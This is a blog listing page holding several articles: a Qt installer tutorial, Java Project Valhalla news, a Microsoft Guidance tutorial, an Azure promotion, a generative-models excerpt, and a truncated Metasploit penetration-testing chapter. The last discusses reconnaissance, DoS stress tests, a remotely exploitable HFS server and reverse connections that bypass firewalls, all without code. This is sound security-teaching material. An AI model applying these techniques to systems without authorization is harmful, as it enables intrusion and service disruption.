<Version>1.0.0</Version> <Title>Your application Installer</Title> <Publisher>Your vendor</Publisher> <StartMenuDir>Super App</StartMenuDir> <TargetDir>@HomeDir@/InstallationDirectory</TargetDir> </Installer> Make sure to replace the required XML fields in the preceding code with information relevant to your application and then save and close this file: Now, create a folder named packages inside the deploy folder. This folder will contain the individual packages that you want the user to be able to install, or make them mandatory or optional so that the user can review and decide what will be installed. In the case of simpler Windows applications that are written using Qt and OpenCV, usually it is enough to have just a single package that includes the required files to run your application, and even do silent installation of Microsoft Visual C++ Redistributables. But for more complex cases, and especially when you want to have more control over individual installable elements of your application, you can also go for two or more packages, or even sub-packages. This is done by using domain-like folder names for each package. Each package folder can have a name like com.vendor.product, where vendor and product are replaced by the developer name or company and the application. A subpackage (or sub-component) of a package can be identified by adding. subproduct to the name of the parent package. For instance, you can have the following folders inside the packages folder: com.vendor.product com.vendor.product.subproduct1 com.vendor.product.subproduct2 com.vendor.product.subproduct1.subsubproduct1 … This can go on for as many products (packages) and sub-products (sub-packages) as we like. For our example case, let's create a single folder that contains our executable, since it describes it all and you can create additional packages by simply adding them to the packages folder. Let's name it something like com.amin.qtcvapp. Now, follow these required steps: Now, create two folders inside the new package folder that we created, the com.amin.qtcvapp folder. Rename them to data and meta. These two folders must exist inside all packages. Copy your application files inside the data folder. This folder will be extracted into the target folder exactly as it is (we will talk about setting the target folder of a package in the later steps). In case you are planning to create more than one package, then make sure to separate their data correctly and in a way that it makes sense. Of course, you won't be faced with any errors if you fail to do so, but the users of your application will probably be confused, for instance by skipping a package that should be installed at all times and ending up with an installed application that does not work. Now, switch to the meta folder and create the following two files inside that folder, and fill them with the codes provided for each one of them. The package.xml file should contain the following. There's no need to mention that you must fill the fields inside the XML with values relevant to your package: <?xml version="1.0" encoding="UTF-8"?> <Package> <DisplayName>The component</DisplayName> <Description>Install this component.</Description> <Version>1.0.0</Version> <ReleaseDate>1984-09-16</ReleaseDate> <Default>script</Default> <Script>installscript.qs</Script> </Package> The script in the previous XML file, which is probably the most important part of the creation of an installer, refers to a Qt Installer Script (*.qs file), which is named installerscript.qs and can be used to further customize the package, its target folder, and so on. So, let us create a file with the same name (installscript.qs) inside the meta folder, and use the following code inside it: function Component() { // initializations go here } Component.prototype.isDefault = function() { // select (true) or unselect (false) the component by default return true; } Component.prototype.createOperations = function() { try { // call the base create operations function component.createOperations(); } catch (e) { console.log(e); } } This is the most basic component script, which customizes our package (well, it only performs the default actions) and it can optionally be extended to change the target folder, create shortcuts in the Start menu or desktop (on Windows), and so on. It is a good idea to keep an eye on the Qt Installer Framework documentation and learn about its scripting to be able to create more powerful installers that can put all of the required dependencies of your app in place, and automatically. You can also browse through all of the examples inside the examples folder of the Qt Installer Framework and learn how to deal with different deployment cases. For instance, you can try to create individual packages for Qt and OpenCV dependencies and allow the users to deselect them, in case they already have the Qt runtime libraries on their computer. The last step is to use the binarycreator tool to create our single and standalone installer. Simply run the following command by using a Command Prompt (or Terminal) instance: binarycreator -p packages -c config.xml myinstaller The binarycreator is located inside the Qt Installer Framework bin folder. It requires two parameters that we have already prepared. -p must be followed by our packages folder and -c must be followed by the configuration file (or config.xml) file. After executing this command, you will get myinstaller (on Windows, you can append *.exe to it), which you can execute to install your application. This single file should contain all of the required files needed to run your application, and the rest is taken care of. You only need to provide a download link to this file, or provide it on a CD to your users. The following are the dialogs you will face in this default and most basic installer, which contains most of the usual dialogs you would expect when installing an application: If you go to the installation folder, you will notice that it contains a few more files than you put inside the data folder of your package. Those files are required by the installer to handle modifications and uninstall your application. For instance, the users of your application can easily uninstall your application by executing the maintenance tool executable, which would produce another simple and user-friendly dialog to handle the uninstall process: We saw how to deploy a QT + OpenCV applications using static linking, dynamic linking, and QT installer. If you found our post useful, do check out this book Computer Vision with OpenCV 3 and Qt5  to accentuate your OpenCV applications by developing them with Qt.  
Read more
  • 0
  • 0
  • 37237
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-openjdk-project-valhallas-head-shares-how-they-plan-to-enhance-the-java-language-and-jvm-with-value-types-and-more
Bhagyashree R
10 Dec 2019
4 min read
Save for later

OpenJDK Project Valhalla’s head shares how they plan to enhance the Java language and JVM with value types, and more

Bhagyashree R
10 Dec 2019
4 min read
Announced in 2014, Project Valhalla is an experimental OpenJDK project to bring major new language features to Java 10 and beyond. It primarily focuses on enabling developers to create and utilize value types, or non-reference values. Last week, the project’s head Brian Goetz shared the goal, motivation, current status, and other details about the project in a set of documents called “State of Valhalla”. Goetz shared that in the span of five years, the team has come up with five distinct prototypes of the project. Sharing the current state of the project, he wrote, “We believe we are now at the point where we have a clear and coherent path to enhance the Java language and virtual machine with value types, have them interoperate cleanly with existing generics, and have a compatible path for migrating our existing value-based classes to inline classes and our existing generic classes to specialized generics.” The motivation behind Project Valhalla One of the main motivations behind Project Valhalla was adapting the Java language and runtime to modern hardware. It’s almost been 25 years since Java was introduced and a lot has changed since then. At that time, the cost of a memory fetch and an arithmetic operation was roughly the same, but this is not the case now. Today, the memory fetch operations have become 200 to 1,000 times more expensive as compared to arithmetic operations. Java is often considered to be a pointer-heavy language as most Java data structures in an application are objects or reference types. This is why Project Valhalla aims to introduce value types to get rid of the type overhead both in memory as well as in computation. Goetz wrote, “We aim to give developers the control to match data layouts with the performance model of today’s hardware, providing Java developers with an easier path to flat (cache-efficient) and dense (memory-efficient) data layouts without compromising abstraction or type safety.” The language model for incorporating inline types Goetz further moved on to talk about how the team is accommodating inline classes in the language type system. He wrote, “The motto for inline classes is: codes like a class, works like an int; the latter part of this motto means that inline types should align with the behaviors of primitive types outlined so far.” This means that inline classes will enable developers to write types that behave more like Java's inbuilt primitive types. Inline classes are similar to current classes in the sense that they can have properties, methods, constructors, and so on. However, the difference that Project Valhalla brings is that instances of inline classes or inline objects do not have an identity, the property that distinguishes them from other objects. This is why operations that are identity-sensitive like synchronization are not possible with inline objects. There are a bunch of other differences between inline and identity classes. Goetz wrote, “Object identity serves, among other things, to enable mutability and layout polymorphism; by giving up identity, inline classes must give up these things. Accordingly, inline classes are implicitly final, cannot extend any other class besides Object...and their fields are implicitly final.” In Project Valhalla, the types are divided into inline and reference types where inline types include primitives and reference types are those that are not inline types such as declared identity classes, declared interfaces, array types, etc. He further listed a few migration scenarios including value-based classes, primitives, and specialized generics. Check out Goetz’s post to know more in detail about the Project Valhalla. OpenJDK Project Valhalla is ready for developers working in building data structures or compiler runtime libraries OpenJDK Project Valhalla’s LW2 early access builds are now available for you to test OpenJDK Project Valhalla is now in Phase III
Read more
  • 0
  • 0
  • 37196

article-image-getting-started-with-microsoft-guidance
Prakhar Mishra
28 Feb 2024
8 min read
Save for later

Getting Started with Microsoft Guidance

Prakhar Mishra
28 Feb 2024
8 min read
Dive deeper into the world of AI innovation and stay ahead of the AI curve! Subscribe to our AI_Distilled newsletter for the latest insights and books. Don't miss out – sign up today!IntroductionThe emergence of a massive language model is a watershed moment in the field of artificial intelligence (AI) and natural language processing (NLP). Because of their extraordinary capacity to write human-like text and perform a range of language-related tasks, these models, which are based on deep learning techniques, have earned considerable interest and acceptance. This field has undergone significant scientific developments in recent years. Researchers all over the world have been developing better and more domain-specific LLMs to meet the needs of various use cases.Large Language Models (LLMs) such as GPT-3 and its descendants, like any technology or strategy, have downsides and limits. And, in order to use LLMs properly, ethically, and to their maximum capacity, it is critical to grasp their downsides and limitations. Unlike large language models such as GPT-4, which can follow the majority of commands. Language models that are not equivalently large enough (such as GPT-2, LLaMa, and its derivatives) frequently suffer from the difficulty of not following instructions adequately, particularly the part of instruction that asks for generating output in a specific structure. This causes a bottleneck when constructing a pipeline in which the output of LLMs is fed to other downstream functions.Introducing Guidance - an effective and efficient means of controlling modern language models compared to conventional prompting methods. It supports both open (LLaMa, GPT-2, Alpaca, and so on) and closed LLMs (ChatGPT, GPT-4, and so on). It can be considered as a part of a larger ecosystem of tools for expanding the capabilities of language models.Guidance uses Handlebars - a templating language. Handlebars allow us to build semantic templates effectively by compiling templates into JavaScript functions. Making it’s execution faster than other templating engines. Guidance also integrates well with Jsonformer - a bulletproof way to generate structured JSON from language models. Here’s a detailed notebook on the same. Also, in case you were to use OpenAI from Azure AI then Guidance has you covered - notebook.Moving on to some of the outstanding features that Guidance offers. Feel free to check out the entire list of features.Features1. Guidance Acceleration - This addition significantly improves inference performance by efficiently utilizing the Key/Value caches as we proceed through the prompt by keeping a session state with the LLM inference. Benchmarking revealed a 50% reduction in runtime when compared to standard prompting approaches. Here’s the link to one of the benchmarking exercises. The below image shows an example of generating a character profile of an RPG game in JSON format. The green highlights are the generations done by the model, whereas the blue and no highlights are the ones that are copied as it is from the input prompt, unlike the traditional method that tries to generate every bit of it.SourceNote: As of now, the Guidance Acceleration feature is implemented for open LLMs. We can soon expect to see if working with closed LLMs as well.2.  Token Healing - This feature attempts to correct tokenization artifacts that commonly occur at the border between the end of a prompt and the start of a group of generated tokens.For example - If we ask LLM to auto-complete a URL with the below-mentioned Input, it’s likely to produce the shown output. Apart from the obvious limitation that the URL might not be valid. I'd like to draw your attention to the extra space it creates (highlighted in red). Such considerations make it difficult to construct a dependable parsing function and robustly absorb its result into subsequent phases.Input: “The link is <a href=http:”Actual Output: “The link is <a href=http: //www.google.com/search?q”Expected Output: “The link is <a href=http://www.google.com/search?q” This is the exact bucket of problems that Token Healing tries to solve using the backtracking method. Feel free to check out this jupyter notebook for more examples.3. Guaranteed Output Structure - Large language models are fantastic at producing useful outputs, but not so much at producing outputs in a specified format (especially open-source ones like LLaMa, GPT-2, and so on). When we want to use the output of a language model as input to another system, this is frequently an issue. With Handlebars, guidance guarantees the output format to be the same as what was being asked for.Let’s now see Guidance in action -InstallationInstalling guidance is a breeze, just do a pip :$ pip install guidanceAssume we are now creating a product description for an e-commerce website. Here's how the traditional generation compares to the guidance generation. Feel free to play with this colab notebook with both the below examples.Traditional GenerationInput:Consider you are an e-commerce expert. You need to write a product description for a product to be listed on the e-commerce website. The product description consists of fixed set of fields to be filled in the JSON. The below shown JSON is the structure of the description with constraints for each of the attributes enclosed within < > brackets. Please follow the mentioned constraint and format diligently. { prod_id: <numeric value of 5 digits>, prod_name: <name starts with the prefix 'p_'>, prod_price: <should be an integer between 1 and 16. Should end with suffix '$'> } The product description isOutput:Consider you are an e-commerce expert. You need to write a product description for a product to be listed on the e-commerce website. The product description consists of fixed set of fields to be filled in the JSON. The below shown JSON is the structure of the description with constraints for each of the attributes enclosed within < > brackets. Please follow the mentioned constraint and format diligently. {   prod_id: <numeric value of 5 digits>,     prod_name: <name starts with the prefix 'p_'>, prod_price: <should be an integer between 1 and 16. Should end with suffix '$'> } The product description is { resentprod_id: <numeric value of 5 digits>, resentprod_name: <name begins with the prefix 'p_'>, resentprod_price: <should be an integer between 1 and 16. Should end with suffix '$'> } In the above example, the product description has 5 constraint fields and 5 attribute fields. The constraints are as follows: resentprod_id: - value of 5 digits, resentprod_name: - name of the product, resentprod_price: - price of the product, resentprod_price_suffix: - suffix of the product price, resentprod_id: - the product id, resentpro diabetic_id: value of 4 digits, resentprod_ astronomer_id: - value of 4 digits, resentprod_ star_id: - value of 4 digits, resentprod_is_generic: - if the product is generic and not the generic type, resentprod_type: - the type of the product, resentprod_is_generic_typeHere’s the code for the above example with GPT-2 language model -``` from transformers import AutoModelForCausalLM, AutoTokenizer tokenizer = AutoTokenizer.from_pretrained("gpt2-large") model = AutoModelForCausalLM.from_pretrained("gpt2-large") inputs = tokenizer(Input, return_tensors="pt") tokens = model.generate( **inputs, max_new_tokens=256, temperature=0.7, do_sample=True, )Output:tokenizer.decode(tokens[0], skip_special_tokens=True)) ```Guidance GenerationInput w/ code:guidance.llm = guidance.llms.Transformers("gpt-large") # define the prompt program = guidance("""Consider you are an e-commerce expert. You need to write a product description for a product to be listed on the e-commerce website. The product description consists of fixed set of fields to be filled in the JSON. The following is the format ```json { "prod_id": "{{gen 'id' pattern='[0-9]{5}' stop=','}}", "prod_name": "{{gen 'name' pattern='p_[A-Za-z]+' stop=','}}", "prod_price": "{{gen 'price' pattern='\b([1-9]|1[0-6])\b\$' stop=','}}" }```""") # execute the prompt Output = program()Output:Consider you are an e-commerce expert. You need to write a product description for a product to be listed on the e-commerce website. The product description consists of a fixed set of fields to be filled in the JSON. The following is the format```json { "prod_id": "11231", "prod_name": "p_pizzas", "prod_price": "11$" }```As seen in the preceding instances, with guidance, we can be certain that the output format will be followed within the given restrictions no matter how many times we execute the identical prompt. This capability makes it an excellent choice for constructing any dependable and strong multi-step LLM pipeline.I hope this overview of Guidance has helped you realize the value it may provide to your daily prompt development cycle. Also, here’s a consolidated notebook showcasing all the features of Guidance, feel free to check it out.Author BioPrakhar has a Master’s in Data Science with over 4 years of experience in industry across various sectors like Retail, Healthcare, Consumer Analytics, etc. His research interests include Natural Language Understanding and generation, and has published multiple research papers in reputed international publications in the relevant domain. Feel free to reach out to him on LinkedIn
Read more
  • 0
  • 0
  • 37191

article-image-5-reasons-node-js-developers-might-actually-love-using-azure-sponsored-by-microsoft
Richard Gall
24 May 2019
6 min read
Save for later

5 reasons Node.js developers might actually love using Azure [Sponsored by Microsoft]

Richard Gall
24 May 2019
6 min read
If you’re a Node.js developer, it might seem odd to be thinking about Azure. However, as the software landscape becomes increasingly cloud native, it’s well worth thinking about the cloud solution you and your organization uses. It should, after all, make life easier for you as much as it should help your company scale and provide better services and user experiences for customers. We don’t often talk about it, but cloud isn’t one thing: it’s a set of tools that provide developers with new ways of building and managing apps. It helps you experiment and learn. In the development of Azure, developer experience is at the top of the agenda. In many ways the platform represents Microsoft’s transformation as an organization, from one that seemed to distrust open source developers, to one which is hell bent on making them happier and more productive. So, if you’re a Node.js developer - or any kind of JavaScript developer, for that matter - reading this with healthy scepticism (and why wouldn’t you), let’s look at some of the reasons and ways Azure can support you in your work... This post is part of a series brought to you in conjunction with Microsoft. Download Learning Node.js Development for free courtesy of Microsoft here. Deploy apps quickly with Azure App Service  As a developer, deploying applications quickly is one of your top priorities. Azure does that thanks to Azure App Service. Essentially, Azure App Service is a PaaS that brings together a variety of other Azure services and resources helping you to develop and host applications without worrying about your infrastructure.   There are lots of reasons to love Azure App Service, not least the speed with which it allows you to get up and running, but most importantly it gives application developers access to a range of Azure features, such as load balancing and security, as well as the platforms integrations with tools for DevOps processes.   Azure App Service works for developers working with a range of platforms, from Python to PHP - Node.js developers that want to give it a try should start here.   Manage application and infrastructure resources with the Azure CLI The Azure CLI is a useful tool for managing cloud resources. It can also be used to deploy an application quickly. If you’re a developer that likes working with the CLI, this feature really does offer a nice way of working, allowing you to easily move between each step in the development and deployment process. If you want to try deploying a Node.js application using the Azure CLI, check out this tutorial, or learn more about the Azure CLI here. Go serverless with Azure Functions Serverless has been getting serious attention over the last 18 months. While it’s true that serverless is a hyped field, and that in reality there are serious considerations to be made about how and where you choose to run your software, it’s relatively easy to try it out for yourself using Azure. In fact, the name itself is useful in demystifying serverless. The word ‘functions’ is a much more accurate description what you’re doing as a developer. A function is essentially a small piece of code that runs in the cloud that execute certain actions or tasks in specific situations. There are many reasons to go serverless, from a pay per use pricing model to support for your preferred dependencies. And while there are plenty of options in terms of cloud providers, Azure is worth exploring because it makes it so easy for developers to leverage. Learn more about Azure Functions here. Simple, accessible dashboards for logging and monitoring In 2019 building more reliable and observable systems will expand from the preserve of SREs and become something developers are accountable for too. This is the next step in the evolution of software engineering, as new silos are broken down. It’s for this reason that the monitoring tools offered by Azure could prove to be so valuable for developers. With Application Insights and Azure Monitor, you can gain the level of transparency you need to properly manage your application. Learn how to successfully monitor a Node.js app here. Build and deploy applications with Azure DevOps DevOps shouldn’t really require additional effort and thinking - but more often than not it does. Azure is a platform that appears to understand this implicitly, and the team behind it have done a lot to make it easier to cultivate a DevOps culture with several useful tools and integrations. Azure Test Plans is a toolkit for testing applications, which can seriously help you improve the way you test in your development processes, while Azure Boards can support project management from inside the Azure ecosystem - useful if you’re looking for a new way to manage agile workflows. But perhaps the most important feature within Azure DevOps - for developers at least - is Azure Pipelines. Azure Pipelines is particularly useful for JavaScript developers as it gives you the option to run a build pipeline on a Microsoft hosted agent that has a wide range of common JavaScript tools (like Yarn and Gulp) pre-installed. Microsoft claims this is the “simplest way to build and deploy” because “maintenance and upgrades are taken care of for you. Each time you run a pipeline, you get a fresh virtual machine. The virtual machine is discarded after one use.” Find out how to build, test, and deploy Node.js apps using Azure Pipelines with this tutorial. Read next: 5 developers explain why they use Visual Studio Code Conclusion: Azure is a place to experiment and learn We often talk about cloud as a solution or service. And although it can provide solutions to many urgent problems, it’s worth remembering that cloud is really a set of many different tools. It isn’t one thing. Because of this, cloud platforms like Azure are as much places to experiment and try out new ways of working as it is simply someone else’s server space. With that in mind, it could be worth experimenting with Azure to try out new ideas - after all, what’s the worst that can happen? More than anything, cloud native should make development fun. Find out how to get started with Node.js on Azure. Download Learning Node.js with Azure for free from Microsoft.
Read more
  • 0
  • 0
  • 37191

article-image-getting-know-generative-models-types
Sunith Shetty
20 Feb 2018
9 min read
Save for later

Getting to know Generative Models and their types

Sunith Shetty
20 Feb 2018
9 min read
[box type="note" align="" class="" width=""]This article is an excerpt from a book written by Rajdeep Dua and Manpreet Singh Ghotra titled Neural Network Programming with Tensorflow. In this book, you will use TensorFlow to build and train neural networks of varying complexities, without any hassle.[/box] In today’s tutorial, we will learn about generative models, and their types. We will also look into how discriminative models differs from generative models. Introduction to Generative models Generative models are the family of machine learning models that are used to describe how data is generated. To train a generative model we first accumulate a vast amount of data in any domain and later train a model to create or generate data like it. In other words, these are the models that can learn to create data that is similar to data that we give them. One such approach is using Generative Adversarial Networks (GANs). There are two kinds of machine learning models: generative models and discriminative models. Let's examine the following list of classifiers: decision trees, neural networks, random forests, generalized boosted models, logistic regression, naive bayes, and Support Vector Machine (SVM). Most of these are classifiers and ensemble models. The odd one out here is Naive Bayes. It's the only generative model in the list. The others are examples of discriminative models. The fundamental difference between generative and discriminative models lies in the underlying probability inference structure. Let's go through some of the key differences between generative and discriminative models. Discriminative versus generative models Discriminative models learn P(Y|X), which is the conditional relationship between the target variable Y and features X. This is how least squares regression works, and it is the kind of inference pattern that gets used. It is an approach to sort out the relationship among variables. Generative models aim for a complete probabilistic description of the dataset. With generative models, the goal is to develop the joint probability distribution P(X, Y), either directly or by computing P(Y | X) and P(X) and then inferring the conditional probabilities required to classify newer data. This method requires more solid probabilistic thought than regression demands, but it provides a complete model of the probabilistic structure of the data. Knowing the joint distribution enables you to generate the data; hence, Naive Bayes is a generative model. Suppose we have a supervised learning task, where xi is the given features of the data points and yi is the corresponding labels. One way to predict y on future x is to learn a function f() from (xi,yi) that takes in x and outputs the most likely y. Such models fall in the category of discriminative models, as you are learning how to discriminate between x's from different classes. Methods like SVMs and neural networks fall into this category. Even if you're able to classify the data very accurately, you have no notion of how the data might have been generated. The second approach is to model how the data might have been generated and learn a function f(x,y) that gives a score to the configuration determined by x and y together. Then you can predict y for a new x by finding the y for which the score f(x,y) is maximum. A canonical example of this is Gaussian mixture models. Another example of this is: you can imagine x to be an image and y to be a kind of object like a dog, namely in the image. The probability written as p(y|x) tells us how much the model believes that there is a dog, given an input image compared to all possibilities it knows about. Algorithms that try to model this probability map directly are called discriminative models. Generative models, on the other hand, try to learn a function called the joint probability p(y, x). We can read this as how much the model believes that x is an image and there is a dog y in it at the same time. These two probabilities are related and that could be written as p(y, x) = p(x) p(y|x), with p(x) being how likely it is that the input x is an image. The p(x) probability is usually called a density function in literature. The main reason to call these models generative ultimately connects to the fact that the model has access to the probability of both input and output at the same time. Using this, we can generate images of animals by sampling animal kinds y and new images x from p(y, x). We can mainly learn the density function p(x) which only depends on the input space. Both models are useful; however, comparatively, generative models have an interesting advantage over discriminative models, namely, they have the potential to understand and explain the underlying structure of the input data even when there are no labels available. This is very desirable when working in the real world. Types of generative models Discriminative models have been at the forefront of the recent success in the field of machine learning. Models make predictions that depend on a given input, although they are not able to generate new samples or data. The idea behind the recent progress of generative modeling is to convert the generation problem to a prediction one and use deep learning algorithms to learn such a problem. Autoencoders One way to convert a generative to a discriminative problem can be by learning the mapping from the input space itself. For example, we want to learn an identity map that, for each image x, would ideally predict the same image, namely, x = f(x), where f is the predictive model. This model may not be of use in its current form, but from this, we can create a generative model. Here, we create a model formed of two main components: an encoder model q(h|x) that maps the input to another space, which is referred to as hidden or the latent space represented by h, and a decoder model q(x|h) that learns the opposite mapping from the hidden input space. These components--encoder and decoder--are connected together to create an end-to-end trainable model. Both the encoder and decoder models are neural networks of different architectures, for example, RNNs and Attention Nets, to get desired outcomes. As the model is learned, we can remove the decoder from the encoder and then use them separately. To generate a new data sample, we can first generate a sample from the latent space and then feed that to the decoder to create a new sample from the output space. GAN As seen with autoencoders, we can think of a general concept to create networks that will work together in a relationship, and training them will help us learn the latent spaces that allow us to generate new data samples. Another type of generative network is GAN, where we have a generator model q(x|h) to map the small dimensional latent space of h (which is usually represented as noise samples from a simple distribution) to the input space of x. This is quite similar to the role of decoders in autoencoders. The deal is now to introduce a discriminative model p(y| x), which tries to associate an input instance x to a yes/no binary answer y, about whether the generator model generated the input or was a genuine sample from the dataset we were training on. Let's use the image example done previously. Assume that the generator model creates a new image, and we also have the real image from our actual dataset. If the generator model was right, the discriminator model would not be able to distinguish between the two images easily. If the generator model was poor, it would be very simple to tell which one was a fake or fraud and which one was real. When both these models are coupled, we can train them end to end by assuring that the generator model is getting better over time to fool the discriminator model, while the discriminator model is trained to work on the harder problem of detecting frauds. Finally, we desire a generator model with outputs that are indistinguishable from the real data that we used for the training. Through the initial parts of the training, the discriminator model can easily detect the samples coming from the actual dataset versus the ones generated synthetically by the generator model, which is just beginning to learn. As the generator gets better at modeling the dataset, we begin to see more and more generated samples that look similar to the dataset. The following example depicts the generated images of a GAN model learning over time: Sequence models If the data is temporal in nature, then we can use specialized algorithms called Sequence Models. These models can learn the probability of the form p(y|x_n, x_1), where i is an index signifying the location in the sequence and x_i is the ith  input sample. As an example, we can consider each word as a series of characters, each sentence as a series of words, and each paragraph as a series of sentences. Output y could be the sentiment of the sentence. Using a similar trick from autoencoders, we can replace y with the next item in the series or sequence, namely y = x_n + 1, allowing the model to learn. To summarize, we learned generative models are a fast advancing area of study and research. As we proceed to advance these models and grow the training and datasets, we can expect to generate data examples that depict completely believable images. This can be used in several applications such as image denoising, painting, structured prediction, and exploration in reinforcement learning. To know more about how to build and optimize neural networks using TensorFlow, do checkout this book Neural Network Programming with Tensorflow.    
Read more
  • 0
  • 0
  • 37175
article-image-approaching-penetration-test-using-metasploit
Packt
26 Sep 2016
17 min read
Save for later

Approaching a Penetration Test Using Metasploit

Packt
26 Sep 2016
17 min read
"In God I trust, all others I pen-test" - Binoj Koshy, cyber security expert In this article by Nipun Jaswal, authors of Mastering Metasploit, Second Edition, we will discuss penetration testing, which is an intentional attack on a computer-based system with the intension of finding vulnerabilities, figuring out security weaknesses, certifying that a system is secure, and gaining access to the system by exploiting these vulnerabilities. A penetration test will advise an organization if it is vulnerable to an attack, whether the implemented security is enough to oppose any attack, which security controls can be bypassed, and so on. Hence, a penetration test focuses on improving the security of an organization. (For more resources related to this topic, see here.) Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered one of the most effective auditing tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, an extensive exploit development environment, information gathering and web testing capabilities, and much more. This article has been written so that it will not only cover the frontend perspectives of Metasploit, but it will also focus on the development and customization of the framework as well. This article assumes that the reader has basic knowledge of the Metasploit framework. However, some of the sections of this article will help you recall the basics as well. While covering Metasploit from the very basics to the elite level, we will stick to a step-by-step approach, as shown in the following diagram: This article will help you recall the basics of penetration testing and Metasploit, which will help you warm up to the pace of this article. In this article, you will learn about the following topics: The phases of a penetration test The basics of the Metasploit framework The workings of exploits Testing a target network with Metasploit The benefits of using databases An important point to take a note of here is that we might not become an expert penetration tester in a single day. It takes practice, familiarization with the work environment, the ability to perform in critical situations, and most importantly, an understanding of how we have to cycle through the various stages of a penetration test. When we think about conducting a penetration test on an organization, we need to make sure that everything is set perfectly and is according to a penetration test standard. Therefore, if you feel you are new to penetration testing standards or uncomfortable with the term Penetration testing Execution Standard (PTES), please refer to http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines to become more familiar with penetration testing and vulnerability assessments. According to PTES, the following diagram explains the various phases of a penetration test: Refer to the http://www.pentest-standard.org website to set up the hardware and systematic phases to be followed in a work environment; these setups are required to perform a professional penetration test. Organizing a penetration test Before we start firing sophisticated and complex attack vectors with Metasploit, we must get ourselves comfortable with the work environment. Gathering knowledge about the work environment is a critical factor that comes into play before conducting a penetration test. Let us understand the various phases of a penetration test before jumping into Metasploit exercises and see how to organize a penetration test on a professional scale. Preinteractions The very first phase of a penetration test, preinteractions, involves a discussion of the critical factors regarding the conduct of a penetration test on a client's organization, company, institute, or network; this is done with the client. This serves as the connecting line between the penetration tester and the client. Preinteractions help a client get enough knowledge on what is about to be done over his or her network/domain or server. Therefore, the tester will serve here as an educator to the client. The penetration tester also discusses the scope of the test, all the domains that will be tested, and any special requirements that will be needed while conducting the test on the client's behalf. This includes special privileges, access to critical systems, and so on. The expected positives of the test should also be part of the discussion with the client in this phase. As a process, preinteractions discuss some of the following key points: Scope: This section discusses the scope of the project and estimates the size of the project. Scope also defines what to include for testing and what to exclude from the test. The tester also discusses ranges and domains under the scope and the type of test (black box or white box) to be performed. For white box testing, what all access options are required by the tester? Questionnaires for administrators, the time duration for the test, whether to include stress testing or not, and payment for setting up the terms and conditions are included in the scope. A general scope document provides answers to the following questions: What are the target organization's biggest security concerns? What specific hosts, network address ranges, or applications should be tested? What specific hosts, network address ranges, or applications should explicitly NOT be tested? Are there any third parties that own systems or networks that are in the scope, and which systems do they own (written permission must have been obtained in advance by the target organization)? Will the test be performed against a live production environment or a test environment? Will the penetration test include the following testing techniques: ping sweep of network ranges, port scan of target hosts, vulnerability scan of targets, penetration of targets, application-level manipulation, client-side Java/ActiveX reverse engineering, physical penetration attempts, social engineering? Will the penetration test include internal network testing? If so, how will access be obtained? Are client/end-user systems included in the scope? If so, how many clients will be leveraged? Is social engineering allowed? If so, how may it be used? Are Denial of Service attacks allowed? Are dangerous checks/exploits allowed? Goals: This section discusses various primary and secondary goals that a penetration test is set to achieve. The common questions related to the goals are as follows: What is the business requirement for this penetration test? This is required by a regulatory audit or standard Proactive internal decision to determine all weaknesses What are the objectives? Map out vulnerabilities Demonstrate that the vulnerabilities exist Test the incident response Actual exploitation of a vulnerability in a network, system, or application All of the above Testing terms and definitions: This section discusses basic terminologies with the client and helps him or her understand the terms well Rules of engagement: This section defines the time of testing, timeline, permissions to attack, and regular meetings to update the status of the ongoing test. The common questions related to rules of engagement are as follows: At what time do you want these tests to be performed? During business hours After business hours Weekend hours During a system maintenance window Will this testing be done on a production environment? If production environments should not be affected, does a similar environment (development and/or test systems) exist that can be used to conduct the penetration test? Who is the technical point of contact? For more information on preinteractions, refer to http://www.pentest-standard.org/index.php/File:Pre-engagement.png. Intelligence gathering / reconnaissance phase In the intelligence-gathering phase, you need to gather as much information as possible about the target network. The target network could be a website, an organization, or might be a full-fledged fortune company. The most important aspect is to gather information about the target from social media networks and use Google Hacking (a way to extract sensitive information from Google using specialized queries) to find sensitive information related to the target. Footprinting the organization using active and passive attacks can also be an approach. The intelligence phase is one of the most crucial phases in penetration testing. Properly gained knowledge about the target will help the tester to stimulate appropriate and exact attacks, rather than trying all possible attack mechanisms; it will also help him or her save a large amount of time as well. This phase will consume 40 to 60 percent of the total time of the testing, as gaining access to the target depends largely upon how well the system is foot printed. It is the duty of a penetration tester to gain adequate knowledge about the target by conducting a variety of scans, looking for open ports, identifying all the services running on those ports and to decide which services are vulnerable and how to make use of them to enter the desired system. The procedures followed during this phase are required to identify the security policies that are currently set in place at the target, and what we can do to breach them. Let us discuss this using an example. Consider a black box test against a web server where the client wants to perform a network stress test. Here, we will be testing a server to check what level of bandwidth and resource stress the server can bear or in simple terms, how the server is responding to the Denial of Service (DoS) attack. A DoS attack or a stress test is the name given to the procedure of sending indefinite requests or data to a server in order to check whether the server is able to handle and respond to all the requests successfully or crashes causing a DoS. A DoS can also occur if the target service is vulnerable to specially crafted requests or packets. In order to achieve this, we start our network stress-testing tool and launch an attack towards a target website. However, after a few seconds of launching the attack, we see that the server is not responding to our browser and the website does not open. Additionally, a page shows up saying that the website is currently offline. So what does this mean? Did we successfully take out the web server we wanted? Nope! In reality, it is a sign of protection mechanism set by the server administrator that sensed our malicious intent of taking the server down, and hence resulting in a ban of our IP address. Therefore, we must collect correct information and identify various security services at the target before launching an attack. The better approach is to test the web server from a different IP range. Maybe keeping two to three different virtual private servers for testing is a good approach. In addition, I advise you to test all the attack vectors under a virtual environment before launching these attack vectors onto the real targets. A proper validation of the attack vectors is mandatory because if we do not validate the attack vectors prior to the attack, it may crash the service at the target, which is not favorable at all. Network stress tests should generally be performed towards the end of the engagement or in a maintenance window. Additionally, it is always helpful to ask the client for white listing IP addresses used for testing. Now let us look at the second example. Consider a black box test against a windows 2012 server. While scanning the target server, we find that port 80 and port 8080 are open. On port 80, we find the latest version of Internet Information Services (IIS) running while on port 8080, we discover that the vulnerable version of the Rejetto HFS Server is running, which is prone to the Remote Code Execution flaw. However, when we try to exploit this vulnerable version of HFS, the exploit fails. This might be a common scenario where inbound malicious traffic is blocked by the firewall. In this case, we can simply change our approach to connecting back from the server, which will establish a connection from the target back to our system, rather than us connecting to the server directly. This may prove to be more successful as firewalls are commonly being configured to inspect 